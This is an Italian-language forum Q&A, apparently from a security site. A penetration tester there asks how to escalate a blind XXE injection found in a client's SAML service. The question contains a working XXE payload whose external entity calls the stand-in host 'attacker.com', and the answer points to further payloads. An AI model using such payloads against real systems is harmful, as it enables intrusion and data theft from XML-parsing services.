alternative al percorso di attacco per XXE

1

Quindi ho trovato un attacco Xml External Entity (XXE) cieco contro un'infrastruttura SAML durante un impegno con il client, ma mi ha dato problemi cercando di sfruttarlo prima. Posso costruire un semplice XXE:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/">%xxe;
]>
<xml></xml>

e ottengo la connessione http dal loro server, ma qualcosa di più complicato come prelevare un DTD da me e l'esecuzione non ottiene nulla. Riesco a vedere il recupero del DTD ma poi la richiesta DTD (una semplice richiamata al mio server) non viene eseguita. Quindi dopo aver sbattuto la testa contro un muro per tre giorni ho pensato di chiedere alla community se avevano qualche trucco intelligente con XXE o qualsiasi percorso di attacco quando gli attacchi sono limitati.

    
posta staticFlow 07.06.2018 - 02:38
fonte

1 risposta

0

Come per qualsiasi altra cosa in questo campo, la ricerca non fa mai male!

Ho provato un payload trovato qui link che non funzionava in origine, ma poi ho realizzato che l'implementazione richiedeva un valido xml valido tag alla fine che gli esempi non avevano!

    
risposta data 07.06.2018 - 03:52
fonte

Leggi altre domande sui tag